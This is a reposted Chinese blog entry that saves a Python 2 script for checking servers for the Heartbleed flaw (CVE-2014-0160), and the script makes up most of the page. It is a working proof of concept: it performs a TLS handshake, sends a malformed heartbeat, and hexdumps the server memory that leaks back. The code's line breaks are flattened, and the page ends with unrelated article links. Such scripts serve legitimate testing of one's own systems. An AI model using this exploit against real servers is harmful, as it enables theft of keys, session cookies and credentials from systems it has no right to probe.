heartBleed漏洞检查python脚本
来源:互联网 发布:污网络用语是啥意思 编辑:程序博客网 时间:2024/06/05 19:42
日前用burpsuite 检查一网站,使用heartBleed插件没有检查出来,但是openvas检查说有。在网上找python验证下,果然有。so,脚本记录下。
#!/usr/bin/python# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)# The author disclaims copyright to this source code.import sysimport structimport socketimport timeimport selectimport refrom optparse import OptionParseroptions = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')def h2bin(x): return x.replace(' ', '').replace('\n', '').decode('hex')hello = h2bin('''16 03 02 00 dc 01 00 00 d8 03 02 5343 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cfbd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 0000 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 8800 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1cc0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0cc0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 1100 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 0403 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 1900 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 0800 06 00 07 00 14 00 15 00 04 00 05 00 12 00 1300 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 0000 0f 00 01 01 ''')hb = h2bin(''' 18 03 02 00 0301 40 00''')def hexdump(s): for b in xrange(0, len(s), 16): lin = [c for c in s[b : b + 16]] hxdat = ' '.join('%02X' % ord(c) for c in lin) pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin) print ' %04x: %-48s %s' % (b, hxdat, pdat) printdef recvall(s, length, timeout=5): endtime = time.time() + timeout rdata = '' remain = length while remain > 0: rtime = endtime - time.time() if rtime < 0: return None r, w, e = select.select([s], [], [], 5) if s in r: data = s.recv(remain) # EOF? if not data: return None rdata += data remain -= len(data) return rdatadef recvmsg(s): hdr = recvall(s, 5) if hdr is None: print 'Unexpected EOF receiving record header - server closed connection' return None, None, None typ, ver, ln = struct.unpack('>BHH', hdr) pay = recvall(s, ln, 10) if pay is None: print 'Unexpected EOF receiving record payload - server closed connection' return None, None, None print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay)) return typ, ver, paydef hit_hb(s): s.send(hb) while True: typ, ver, pay = recvmsg(s) if typ is None: print 'No heartbeat response received, server likely not vulnerable' return False if typ == 24: print 'Received heartbeat response:' hexdump(pay) if len(pay) > 3: print 'WARNING: server returned more data than it should - server is vulnerable!' else: print 'Server processed malformed heartbeat, but did not return any extra data.' return True if typ == 21: print 'Received alert:' hexdump(pay) print 'Server returned error, likely not vulnerable' return Falsedef main(): opts, args = options.parse_args() if len(args) < 1: options.print_help() return s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) print 'Connecting...' sys.stdout.flush() s.connect((args[0], opts.port)) print 'Sending Client Hello...' sys.stdout.flush() s.send(hello) print 'Waiting for Server Hello...' sys.stdout.flush() while True: typ, ver, pay = recvmsg(s) if typ == None: print 'Server closed connection without sending Server Hello.' return # Look for server hello done message. if typ == 22 and ord(pay[0]) == 0x0E: break print 'Sending heartbeat request...' sys.stdout.flush() s.send(hb) hit_hb(s)if __name__ == '__main__': main()
阅读全文
0 0
- heartBleed漏洞检查python脚本
- OpenSSL重大漏洞-Heartbleed之漏洞利用脚本POC讲解
- 关于OpenSSL heartbleed漏洞
- openssl heartbleed高危漏洞
- SSL HEARTBLEED 漏洞
- OpenSSL Heartbleed 漏洞
- Heartbleed第二篇:Heartbleed漏洞剖析
- OpenSSL相关的漏洞--heartbleed
- OpenSSL“Heartbleed”的漏洞exp
- 解码Heartbleed心脏出血漏洞
- 浅谈OpenSSL的Heartbleed漏洞
- 【OpenSSL】heartbleed漏洞源码分析
- HeartBleed漏洞详解与利用
- python 软件漏洞挖掘脚本
- Python网站的漏洞如何检查?
- “Heartbleed”漏洞恐令数十万服务器泄密
- 利用 Heartbleed 漏洞劫持用户登录会话
- 解码心脏出血漏洞 图解Heartbleed Bug
- leecode-easy-addbinary
- Linux reserved memory分析
- GIT 查看/修改用户名和邮箱地址 原创 2016年08月17日 13:36:39 标签:git 46999 用户名和邮箱地址的作用 用户名和邮箱地址是本地git客户端的一个变量,不随git库而改变
- cocos2d-x3.2 24种基本特效
- Retrofit 探索二:RxJava+Retrofit实现网络请求
- heartBleed漏洞检查python脚本
- sequelize格式化时间
- 第二部分Calendar原理和思想
- Vue学习日志:事件处理器(8)
- Ceres学习(四)
- 面向对象
- 对象内存管理
- strcpy、strncpy、memcpy的区别
- 继承